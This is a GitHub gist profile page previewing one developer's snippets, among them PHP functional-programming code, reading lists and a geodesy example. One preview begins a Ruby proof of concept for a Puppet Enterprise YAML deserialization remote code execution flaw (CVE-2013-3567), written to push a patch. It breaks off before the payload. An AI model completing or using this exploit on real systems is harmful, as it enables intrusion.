Skip to content

Instantly share code, notes, and snippets.

View adaburrows's full-sized avatar

Jillian Ada Burrows adaburrows

View GitHub Profile
@adaburrows
adaburrows / functional_fibonacci.php
Created April 25, 2011 04:02
Functional Programming in PHP
<?php
/**
* Fibonacci:
*============================================================================
* Class for computing fibonacci numbers using functional programming in PHP
* Uses the formula at: http://jburrows.wordpress.com/2009/12/30/fibonacci/
*/
class fibonacci {
@adaburrows
adaburrows / functional_php_web_app.php
Created April 26, 2011 05:31
Sketch of how to make a functional style controller in PHP
<?php
/**
* This is by no means complete, but it's a sketch of an idea I had to create a
* classless functional style framework for PHP.
*
* It might turn out to be something cool!
*/
// This function allows creating a new function from two functions passed into it
function compose(&$f, &$g) {
@adaburrows
adaburrows / compose_functions.php
Created April 26, 2011 06:24
Composing functions in PHP
<?php
/**
* Just trying out more functional programming in PHP
* This gist provides some basic utility functions for:
* + Working with functions
* + Working with arrays
*/
// This function allows creating a new function from two functions passed into it
function compose(&$f, &$g) {
@adaburrows
adaburrows / PE2_8_2RCE.rb
Last active May 22, 2020 22:48
Puppet Enterprise 2.8.2 Remote Code Execution Exploit CVE-2013-3567 -- This uses the same YAML RCE flaw just with different classes known to be installed in this configuration. This is my original PoC I wrote at Puppet to force my coworkers to patch.
require 'puppet'
require 'puppet/network/http_pool'
require 'uri'
url = URI.parse('https://localhost:443/reports/upload')
headers = { "Content-Type" => "application/x-yaml" }
body = <<HELLO
--- !ruby/object:Puppet::Transaction::Report
metrics:
resources: !ruby/object:Puppet::Util::Metric

Keybase proof

I hereby claim:

  • I am adaburrows on github.
  • I am adaburrows (https://keybase.io/adaburrows) on keybase.
  • I have a public key ASDE6w2y_MoIs8mhnREyU6Y7KMResn9WwjO2vSEC9OaCtQo

To claim this, I am signing this object:

Essential Reading For Coms Security and Open Source Infrastructure Efforts

Our current cellphone, wireless, and wired infrasture is insecure. And from the mistakes the industries continue to make it isn't showing many signs of getting better. One of the first steps we can take to make the current standards and implementations open. Once it's open it will become easier to see exactly what needs to be changed. Hopefully, it will also make it easier for the industries to adopt new standards by adopting one of multiple open implementations. This approach has shown promise in many countries which don't already have the infrastructure investment the US does.

TOC

  1. Coms Security & Privacy Reading List
  2. Towards Completely Open Source Basebands
  3. [IMSI catcher software/detection](https://gi
@adaburrows
adaburrows / education_prerequisites.md
Created February 9, 2020 01:56
Discussion and links on education and necessary preconditions for education

Education is one of the fundamental pillars of a technologically advanced, forward thinking societies. Unfortunately, the focus on test scores has taken curriculum and teaching further away from the basic tethers to reality and the reasons for learning more abstract thought. If we are to address the problems laid out in a paper as old as I am, that our failing education system is a threat to national security, we will have to start focusing on education which starts from actual physical principles and moves toward everything considered abstract in a more concrete way. This means investing in educating teachers and ensuring they understand the principles they are teaching and how they are firmly rooted in the practical.

One of the necessary prerequisites for education is stability in one's household. If a student is so caught up in worrying if they will have food, when they'll be able to study in between doing all the household chores, watching their siblings and/or kids, or if they'll be able to make enough

/**
* Example code for computing azimuths and distance.
*
* This code is good for approximating distance, but some of the code is not
* gauranteed to converge. There are better algorithms located at:
* [Geodesics on an Ellipsoid](https://geographiclib.sourceforge.io/geod.html)
*
* For more background on why this is actually a more complicated problem, see:
* * [Most Changes in Earth's Shape Are Due to Changes in Climate](https://www.nasa.gov/centers/goddard/earthandsun/earthshape.html)
* * [THE EGM96 GEOID UNDULATION WITH RESPECT TO THE WGS84 ELLIPSOID](https://cddis.nasa.gov/926/egm96/doc/S11.HTML)
@adaburrows
adaburrows / Intelligence, Self-Awareness, and Sentience Reading List.md
Last active January 4, 2024 15:57
Intelligence, Self-Awareness, and Sentience Reading List

Intelligence, Self-Awareness, and Sentience Reading List

Questions to think about while reading:

  • What qualifies as intelligence?
  • What qualifies as self-awareness?
  • What qualifies as sentience?
  • Can an intelligence not be sentient, but still report back that it is?
  • Can something be sentient, but not intelligent enough to report back that it is?
  • Can something be neither intelligent or sentient, but be statistically likely to compose sentences like it was trained on that fool a human into thinking it it both intelligent and sentient?